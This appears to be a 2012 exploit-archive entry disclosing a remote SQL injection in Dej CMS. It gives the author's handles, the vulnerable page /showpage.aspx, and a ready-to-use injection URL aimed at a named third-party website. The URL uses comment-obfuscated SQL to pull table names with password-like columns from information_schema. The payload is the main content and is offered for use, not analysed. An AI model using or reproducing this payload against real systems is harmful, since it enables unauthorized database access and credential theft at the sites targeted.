Dej CMS suffers from a remote SQL injection vulnerability.
a7d1c2eecc91ab2fdc1ae5c516aa0dc7a39a3ae2e3e501334e83b556f7641528
# Exploit Title: Dej Cms [SQL Inject]
# Date: [2012.3.5]
# Author: Expl0its
# We Are : Expl0its , Higher_sense , Black.spook & H4ckcity.net - zone-hc.com
# Gmail : Expl0iits@gmail.com
# Software : [http://www.dejcom.com]
Vulnerable Page:
/showpage.aspx
Exploit:
http://www.shahmiri.com/showpage.aspx?id=%27/**/or/**/1=%28select/**/top/**/1/**/table_name/**/from/**/information_schema.columns/**/where/**/column_name/**/like/**/%27pass%27%29--